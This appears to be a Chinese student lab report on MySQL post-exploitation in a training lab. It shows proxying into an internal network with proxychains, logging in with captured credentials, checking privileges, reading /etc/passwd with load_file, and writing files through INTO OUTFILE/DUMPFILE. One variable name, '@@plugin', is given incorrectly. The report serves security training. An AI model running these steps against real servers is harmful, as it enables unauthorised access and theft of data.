一、实验项目名称

后渗透之数据获取实验

二、实验目的

1.掌握kali中连接mysql服务器的方法

2.掌握mysql获取敏感信息的sql语法

三、实验内容

通过已获取的数据库账号密码，通过socks代理流量，将kali中的mysql指令代理到目标内网，连接目标mysql数据库，连接后通过一系列sql指令获取敏感数据

四、实验环境

1.实验平台：CSIITR平台

2.实验目标：172.18.206.15X

3.工具：kali、proxychains、mysql

五、实验步骤

六、实验结果 

1、连接目标mysql数据库的命令为：（答案不唯一，任写一条）

proxychains mysql -u oa -h 192.168.223.3 -p144d993ba34367792dfe58370935c4b5

2、如何查看mysql当前用户的权限：

SHOW GRANTS FOR oa@'%';

3、如何通过mysql读取磁盘文件：

select load_file('/etc/passwd');

七、实验总结 

1、MySQL中哪些内置函数分别表示版本、当前用户、安装目录、数据目录、插件目录？

version()表示版本

current_user()表示当前用户

@@basedir MySQL表示安装目录

@@datadir MySQL表示数据目录

@@plugin MySQL表示插件目录

2、MySQL中可以使用哪些语法结构对磁盘文件进行读和写？

读：load_file

写：into outfile 或者into dumpfile

3、上一题中对磁盘进行读和写的语法结构需要什么前置条件？（尽可能多的写出）

1. 当前数据库用户对文件有读权限

2.当前数据库用户拥有file权限

3.当前数据库用户对文件有写权限

4.文件大小小于max_allowed_packet